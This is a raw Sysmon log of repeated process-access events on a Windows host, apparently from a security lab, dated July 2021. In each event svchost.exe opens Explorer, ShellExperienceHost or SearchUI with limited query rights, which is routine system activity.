08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
